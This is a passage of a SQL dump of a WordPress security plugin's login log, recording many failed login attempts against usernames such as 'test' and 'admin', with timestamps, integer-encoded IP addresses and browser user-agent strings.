(102651, 1499015275.147941, 1, 'loginFailInvalidUsername', 'test', 0, 3171206256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102652, 1499015276.520983, 1, 'loginFailInvalidUsername', 'test', 0, 3171206256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102653, 1499016504.377823, 1, 'loginFailInvalidUsername', '{login}', 0, 1521711259, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102654, 1499017018.362353, 1, 'loginFailInvalidUsername', 'test', 0, 3319952174, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102655, 1499018143.406438, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1834071249, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102656, 1499018659.081093, 1, 'loginFailInvalidUsername', 'test', 0, 762636584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102657, 1499018660.953592, 1, 'loginFailInvalidUsername', 'test', 0, 762636584, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102658, 1499022034.170033, 1, 'loginFailInvalidUsername', 'test', 0, 1891930274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102659, 1499022035.457034, 1, 'loginFailInvalidUsername', 'test', 0, 1891930274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102660, 1499023000.790644, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307655567, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102661, 1499024676.207927, 1, 'loginFailValidUsername', 'admin', 1, 1521617220, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102662, 1499025056.187251, 1, 'loginFailInvalidUsername', 'test', 0, 632731739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102663, 1499025057.224043, 1, 'loginFailInvalidUsername', 'test', 0, 632731739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102664, 1499031006.582238, 1, 'loginFailInvalidUsername', 'test', 0, 1363303233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102665, 1499031161.165564, 1, 'loginFailInvalidUsername', '{login}', 0, 774364586, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102666, 1499032738.360061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1582958461, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102667, 1499037587.588290, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 774362247, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102668, 1499037976.423712, 1, 'loginFailInvalidUsername', 'test', 0, 1835389978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102669, 1499037978.690519, 1, 'loginFailInvalidUsername', 'test', 0, 1835389978, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102670, 1499038048.377784, 1, 'loginFailInvalidUsername', 'test', 0, 2630741534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102671, 1499038049.514564, 1, 'loginFailInvalidUsername', 'test', 0, 2630741534, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102672, 1499039147.888911, 1, 'loginFailInvalidUsername', 'test', 0, 3560722714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102673, 1499039347.529170, 1, 'loginFailInvalidUsername', 'test', 0, 529683379, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102674, 1499039348.576926, 1, 'loginFailInvalidUsername', 'test', 0, 529683379, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102675, 1499041026.478001, 1, 'loginFailInvalidUsername', 'test', 0, 704190390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102676, 1499041028.720948, 1, 'loginFailInvalidUsername', 'test', 0, 704190390, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102677, 1499041593.395358, 1, 'loginFailInvalidUsername', 'test', 0, 1435830550, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102678, 1499042413.025713, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833976227, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102679, 1499043037.971001, 1, 'loginFailInvalidUsername', 'test', 0, 2998448244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102680, 1499043039.133260, 1, 'loginFailInvalidUsername', 'test', 0, 2998448244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102681, 1499043948.309728, 1, 'loginFailInvalidUsername', 'test', 0, 2982301914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102682, 1499043949.678140, 1, 'loginFailInvalidUsername', 'test', 0, 2982301914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102683, 1499044023.285588, 1, 'loginFailValidUsername', 'admin', 1, 1834070804, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102684, 1499045004.711710, 1, 'loginFailValidUsername', 'admin', 1, 3291887408, 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0'),
(102685, 1499045678.248040, 1, 'loginFailInvalidUsername', 'test', 0, 1544811101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102686, 1499045686.727986, 1, 'loginFailInvalidUsername', '{login}', 0, 1309122769, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102687, 1499046578.785211, 1, 'loginFailInvalidUsername', 'test', 0, 737995010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102688, 1499046580.589129, 1, 'loginFailInvalidUsername', 'test', 0, 737995010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102689, 1499047263.555072, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1482953492, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102690, 1499048881.924652, 1, 'loginFailValidUsername', 'admin', 1, 1439668073, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102691, 1499049012.991906, 1, 'loginFailInvalidUsername', 'test', 0, 1570530821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102692, 1499050520.928040, 1, 'loginFailInvalidUsername', '{login}', 0, 3134781161, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102693, 1499051283.717390, 1, 'loginFailValidUsername', 'admin', 1, 1315772161, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)'),
(102694, 1499052141.879492, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1521598392, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102695, 1499053719.825589, 1, 'loginFailValidUsername', 'admin', 1, 1541066812, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102696, 1499053720.118750, 1, 'loginFailValidUsername', 'admin', 1, 90324398, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102697, 1499055289.534467, 1, 'loginFailInvalidUsername', '{login}', 0, 1387955566, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102698, 1499055656.364880, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/533.93.56 (KHTML, like Gecko) Version/5.5.0 Safari/532.10'),
(102699, 1499056807.504790, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102700, 1499058376.422645, 1, 'loginFailValidUsername', 'admin', 1, 1335524237, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102701, 1499059726.714206, 1, 'loginFailInvalidUsername', 'test', 0, 1293776065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102702, 1499059727.833472, 1, 'loginFailInvalidUsername', 'test', 0, 1293776065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102703, 1499060078.128560, 1, 'loginFailInvalidUsername', 'test', 0, 1570530821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102704, 1499060079.055197, 1, 'loginFailInvalidUsername', 'test', 0, 1570530821, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102705, 1499061891.204035, 1, 'loginFailValidUsername', 'pablo', 3, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102706, 1499061894.345077, 1, 'loginFailInvalidUsername', 'vous', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102707, 1499061896.454121, 1, 'loginFailInvalidUsername', 'training', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102708, 1499061898.681291, 1, 'loginFailInvalidUsername', 'notre', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102709, 1499061900.820032, 1, 'loginFailInvalidUsername', 'pour', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102710, 1499061902.983269, 1, 'loginFailInvalidUsername', 'cross', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102711, 1499061905.142334, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102712, 1499061907.620757, 1, 'loginFailInvalidUsername', 'venez', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102713, 1499061909.795708, 1, 'loginFailInvalidUsername', 'outils', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102714, 1499061912.004307, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3230789411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102715, 1499062347.719616, 1, 'loginFailInvalidUsername', 'test', 0, 3065682442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102716, 1499062349.309837, 1, 'loginFailInvalidUsername', 'test', 0, 3065682442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102717, 1499063075.051007, 1, 'loginFailValidUsername', 'admin', 1, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102718, 1499063259.507156, 1, 'loginFailInvalidUsername', 'travail', 0, 3497108325, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102719, 1499063547.129948, 1, 'loginFailInvalidUsername', 'test', 0, 1978637058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102720, 1499063549.077910, 1, 'loginFailInvalidUsername', 'test', 0, 1978637058, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102721, 1499064666.461268, 1, 'loginFailInvalidUsername', '{login}', 0, 1541066812, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(102722, 1499066218.878886, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3279479929, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102723, 1499067738.696639, 1, 'loginFailInvalidUsername', 'test', 0, 3670527750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102724, 1499067740.239982, 1, 'loginFailInvalidUsername', 'test', 0, 3670527750, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102725, 1499067777.725797, 1, 'loginFailValidUsername', 'admin', 1, 998235371, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102726, 1499070842.274753, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1833242594, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102727, 1499071392.195868, 1, 'loginFailValidUsername', 'admin', 1, 3344407295, 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; chromeframe/28.0.1500.37; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)'),
(102728, 1499072407.184723, 1, 'loginFailValidUsername', 'admin', 1, 1424509955, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102729, 1499072454.078715, 1, 'loginFailInvalidUsername', 'test', 0, 1892205804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102730, 1499072455.924951, 1, 'loginFailInvalidUsername', 'test', 0, 1892205804, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102731, 1499072826.760383, 1, 'loginFailInvalidUsername', 'test', 0, 3667643457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102732, 1499072828.255731, 1, 'loginFailInvalidUsername', 'test', 0, 3667643457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102733, 1499074064.925814, 1, 'loginFailInvalidUsername', '{login}', 0, 3105429741, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102734, 1499074831.107970, 1, 'loginFailInvalidUsername', 'test', 0, 2943245315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102735, 1499074832.898561, 1, 'loginFailInvalidUsername', 'test', 0, 2943245315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102736, 1499075655.533870, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102737, 1499077264.352548, 1, 'loginFailValidUsername', 'admin', 1, 1406483535, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102738, 1499078897.957499, 1, 'loginFailInvalidUsername', '{login}', 0, 3107039351, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102739, 1499079481.173916, 1, 'loginFailInvalidUsername', 'test', 0, 48928952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102740, 1499079482.175091, 1, 'loginFailInvalidUsername', 'test', 0, 48928952, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102741, 1499080553.931040, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1564345887, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102742, 1499081829.866750, 1, 'loginFailInvalidUsername', 'test', 0, 1344927053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102743, 1499081830.813709, 1, 'loginFailInvalidUsername', 'test', 0, 1344927053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102744, 1499082106.261735, 1, 'loginFailInvalidUsername', 'test', 0, 1887825188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102745, 1499082107.499325, 1, 'loginFailInvalidUsername', 'test', 0, 1887825188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102746, 1499082134.675287, 1, 'loginFailValidUsername', 'admin', 1, 2537172334, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102747, 1499084454.257570, 1, 'loginFailInvalidUsername', 'test', 0, 1768455669, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102748, 1499084455.415793, 1, 'loginFailInvalidUsername', 'test', 0, 1768455669, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102749, 1499085305.044176, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1043021860, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102750, 1499086595.333466, 1, 'loginFailInvalidUsername', 'test', 0, 1728428970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102751, 1499086596.785355, 1, 'loginFailInvalidUsername', 'test', 0, 1728428970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102752, 1499087822.613390, 1, 'loginFailInvalidUsername', 'test', 0, 1730424002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102753, 1499087823.926410, 1, 'loginFailInvalidUsername', 'test', 0, 1730424002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102754, 1499087855.999532, 1, 'loginFailInvalidUsername', 'test', 0, 1729119484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102755, 1499087857.479914, 1, 'loginFailInvalidUsername', 'test', 0, 1729119484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102756, 1499087931.537796, 1, 'loginFailInvalidUsername', 'test', 0, 1578441763, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102757, 1499087932.517729, 1, 'loginFailInvalidUsername', 'test', 0, 1578441763, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102758, 1499088433.244541, 1, 'loginFailInvalidUsername', '{login}', 0, 637296469, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102759, 1499090312.667948, 1, 'loginFailInvalidUsername', 'test', 0, 1486763258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102760, 1499090313.950752, 1, 'loginFailInvalidUsername', 'test', 0, 1486763258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102761, 1499091645.600067, 1, 'loginFailInvalidUsername', 'test', 0, 1977494876, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102762, 1499091646.934594, 1, 'loginFailInvalidUsername', 'test', 0, 1977494876, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102763, 1499094148.708905, 1, 'loginFailInvalidUsername', 'test', 0, 1892043598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102764, 1499094151.985321, 1, 'loginFailInvalidUsername', 'test', 0, 1892043598, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102765, 1499095491.682529, 1, 'loginFailInvalidUsername', 'test', 0, 694199286, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102766, 1499095561.094316, 1, 'loginFailInvalidUsername', 'test', 0, 1740655719, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102767, 1499095562.476210, 1, 'loginFailInvalidUsername', 'test', 0, 1740655719, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102768, 1499096901.439529, 1, 'loginFailInvalidUsername', 'test', 0, 1563216010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102769, 1499096902.581277, 1, 'loginFailInvalidUsername', 'test', 0, 1563216010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102770, 1499097527.397249, 1, 'loginFailInvalidUsername', 'test', 0, 3381206685, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102771, 1499097528.700184, 1, 'loginFailInvalidUsername', 'test', 0, 3381206685, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102772, 1499097756.256087, 1, 'loginFailInvalidUsername', 'test', 0, 1010049309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102773, 1499097757.766263, 1, 'loginFailInvalidUsername', 'test', 0, 1010049309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102774, 1499098263.441598, 1, 'loginFailInvalidUsername', 'test', 0, 636404794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102775, 1499098265.800203, 1, 'loginFailInvalidUsername', 'test', 0, 636404794, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102776, 1499098821.335809, 1, 'loginFailInvalidUsername', 'test', 0, 2057522090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102777, 1499098822.717216, 1, 'loginFailInvalidUsername', 'test', 0, 2057522090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102778, 1499101772.454669, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.06.59 (KHTML, like Gecko) Version/5.5.1 Safari/532.14'),
(102779, 1499104692.140287, 1, 'loginFailInvalidUsername', 'test', 0, 2098853766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102780, 1499104693.457165, 1, 'loginFailInvalidUsername', 'test', 0, 2098853766, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102781, 1499107561.826351, 1, 'loginFailInvalidUsername', 'test', 0, 694508115, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102782, 1499115131.450212, 1, 'loginFailValidUsername', 'admin', 1, 2745977144, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.0.30618; .NET CLR 3.5.30729)'),
(102783, 1499116960.524394, 1, 'loginFailInvalidUsername', 'test', 0, 3033775030, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102784, 1499118227.834140, 1, 'loginFailInvalidUsername', 'test', 0, 1307411185, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102785, 1499118299.251856, 1, 'loginFailInvalidUsername', 'test', 0, 3135066780, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102786, 1499118406.841354, 1, 'loginFailInvalidUsername', 'test', 0, 2968138720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102787, 1499118408.031233, 1, 'loginFailInvalidUsername', 'test', 0, 2968138720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102788, 1499119749.948715, 1, 'loginFailInvalidUsername', 'test', 0, 1409303625, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102789, 1499119751.651875, 1, 'loginFailInvalidUsername', 'test', 0, 1409303625, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102790, 1499121171.014276, 1, 'loginFailInvalidUsername', 'test', 0, 1834078949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102791, 1499121171.958197, 1, 'loginFailInvalidUsername', 'test', 0, 1834078949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102792, 1499123546.582920, 1, 'loginFailInvalidUsername', 'test', 0, 3308563548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102793, 1499123547.872403, 1, 'loginFailInvalidUsername', 'test', 0, 3308563548, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102794, 1499125922.241126, 1, 'loginFailInvalidUsername', 'test', 0, 1892329650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102795, 1499125923.856840, 1, 'loginFailInvalidUsername', 'test', 0, 1892329650, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102796, 1499126680.128034, 1, 'loginFailInvalidUsername', 'test', 0, 974912594, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102797, 1499126681.453040, 1, 'loginFailInvalidUsername', 'test', 0, 974912594, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102798, 1499131954.572272, 1, 'loginFailInvalidUsername', 'test', 0, 1800230200, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102799, 1499132310.727528, 1, 'loginFailInvalidUsername', 'test', 0, 1040268236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
